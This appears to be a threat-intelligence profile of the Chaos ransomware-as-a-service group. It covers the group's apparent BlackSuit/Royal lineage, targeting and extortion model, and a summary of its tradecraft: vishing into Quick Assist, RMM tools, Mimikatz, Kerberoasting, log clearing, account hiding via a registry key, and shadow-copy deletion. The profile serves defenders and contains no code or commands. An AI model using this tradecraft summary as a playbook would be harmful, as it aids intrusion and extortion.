Chaos

Chaos is a ransomware-as-a-service (RaaS) operation that emerged in February or early 2025 and is assessed by Cisco Talos with moderate confidence as likely formed by former BlackSuit/Royal members, placing it in the broader Royal/Conti lineage. It is distinct from the older 2021 Chaos ransomware builder and related builder-generated variants. Chaos has been described as an open affiliate program recruiting on the RAMP dark web forum, including after the July 24, 2025 seizure of BlackSuit infrastructure, and has been referred to as a BlackSuit successor or ex-Royal operation. The group advertises cross-platform ransomware for Windows, Linux, ESXi, and NAS systems, and claims to exclude CIS/BRICS countries, hospitals, and in some reporting government entities from targeting. Chaos is associated with big-game hunting and double-extortion, and some reporting also describes triple extortion through the addition of DDoS threats. Victims are described as opportunistic across sectors, with a strong concentration in the United States; technology and manufacturing are repeatedly identified among the most affected sectors. Public reporting cited in the content notes victim counts on its leak site and recurring activity through 2025 and into 2026. Observed tradecraft includes social engineering-heavy initial access, especially spam flooding followed by voice phishing in which operators impersonate IT or security staff and persuade victims to launch Microsoft Quick Assist. Secondary access paths mentioned in the content include exploitation of unpatched edge devices and compromised RDP credentials. For persistence and remote access, Chaos has been observed deploying multiple RMM tools, including AnyDesk, ScreenConnect, OptiTune, Syncro RMM, and Splashtop Streamer, as well as reverse SSH tunnels over port 443. Post-compromise activity described in the content includes domain controller and trust enumeration, LDAP queries, reverse DNS lookups, logged-in user discovery, process listing, credential harvesting with Mimikatz, Kerberoasting, password resets with net.exe, token impersonation, lateral movement via RDP, Impacket over SMB/WMI, and use of remote management tools. Defense evasion and recovery inhibition behaviors include clearing PowerShell event logs, attempting to uninstall security or MFA software via WMIC, hiding accounts through the Winlogon SpecialAccounts\Userlist registry key, and deleting shadow copies with vssadmin. Data exfiltration has been observed using GoodSync renamed to wininit.exe. The ransomware appends the .chaos extension and drops ransom notes named README.chaos.txt or readme.chaos.txt. Reporting in the content states that Chaos uses Curve25519 ECDH and AES-256 with per-file unique keys, supports selective partial-file encryption, and threatens publication of stolen data if victims do not pay. Observed ransom demands in the content reached $300,000, and threats have included data leakage, DDoS, and reputational pressure. Known aliases or descriptors directly mentioned in the content include BlackSuit successor, ex-Royal, and former BlackSuit/Royal operators. The content also notes that former BlackSuit affiliates dispersed to other groups including Chaos, INC, Lynx, Cactus, and Nokoyawa. Separately, Rapid7 reported that an Iranian state-sponsored group, MuddyWater, masqueraded as Chaos in at least one intrusion to conceal espionage activity; this reflects abuse of the Chaos brand and is not attribution of Chaos itself to Iran.